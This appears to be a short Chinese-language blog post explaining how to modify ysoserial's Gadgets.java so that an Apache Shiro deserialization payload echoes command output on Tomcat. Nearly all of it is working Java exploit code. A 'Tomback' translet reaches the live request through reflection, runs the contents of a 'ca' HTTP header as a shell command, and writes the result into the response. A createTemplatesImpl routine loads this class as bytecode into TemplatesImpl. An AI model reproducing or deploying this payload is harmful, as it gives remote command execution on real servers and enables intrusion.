Corener
0%

Shiro 回显

Posted on

shiro回显

修改Gadgets.java文件中的内容:

  1. StubTransletPayload.class –> Tomback.class
  2. 修改createTemplatesImpl(final String cmd)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
public static class Tomback extends AbstractTranslet {

    public Object getO(Object o,String s) throws Exception{
        Field f = o.getClass().getDeclaredField(s);
        f.setAccessible(true);
        return f.get(o);
    }

    public Tomback() throws Exception{
        Object o;
        String s;
        for (Thread t:(Thread[])getO(Thread.currentThread().getThreadGroup(),"threads")){
            s = t.getName();
            if (!s.contains("exec") && s.contains("http")){
                try{
                    o = getO(getO(getO(t,"target"),"this$0"),"handler");
                }catch (Exception e){
                    //tomcat 8.5.* ~
                    o = getO(getO(t,"target"),"this$0");
                    Field f = AbstractEndpoint.class.getDeclaredField("handler");
                    f.setAccessible(true);
                    o = f.get(o);
                }
                try{
                    //tomcat 6.*
                    o = getO(o,"global");
                }catch (Exception e){
                    //tomcat7.*-8.0.*
                    o = o.getClass().getSuperclass().getDeclaredMethod("getGlobal").invoke(o);
                }
                for (Object p:(ArrayList<?>)getO(o,"processors")){
                    o = getO(p,"req");
                    s = (String)o.getClass().getMethod("getHeader",String.class).invoke(o,"ca");
                    if(!s.isEmpty()){
                        String[] cmd = System.getProperty("os.name").toLowerCase().contains("window")?new String[]{"cmd.exe","/c",s}:new String[]{"/bin/sh","-c",s};
                        byte[] cm = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
                        ByteChunk bc = new ByteChunk();
                        bc.setBytes(cm,0,cm.length);
                        o = o.getClass().getMethod("getResponse").invoke(o);
                        o.getClass().getMethod("setStatus",int.class).invoke(o,404);
                        o.getClass().getMethod("doWrite",ByteChunk.class).invoke(o,bc);
                        break;
                    }
                }
                break;
            }
        }
    }

    public void transform ( DOM document, SerializationHandler[] handlers ) throws TransletException {}


    @Override
    public void transform ( DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {}
}
    

public static Object createTemplatesImpl(final String cmd) throws Exception {
    TemplatesImpl templates = TemplatesImpl.class.newInstance();
    ClassPool classPool = ClassPool.getDefault();
    classPool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
    classPool.insertClassPath(new ClassClassPath(Tomback.class));
    CtClass clazz = classPool.get(Tomback.class.getName());
    CtClass superC = classPool.get(AbstractTranslet.class.getName());
    clazz.setSuperclass(superC);
    final byte[] classBytes = clazz.toBytecode();
    Field bcField = TemplatesImpl.class.getDeclaredField("_bytecodes");
    bcField.setAccessible(true);
    bcField.set(templates, new byte[][] {classBytes});
    Field nameField = TemplatesImpl.class.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templates, "a");
    clazz.writeFile();
    return templates;
}

效果

reference:https://xz.aliyun.com/t/6227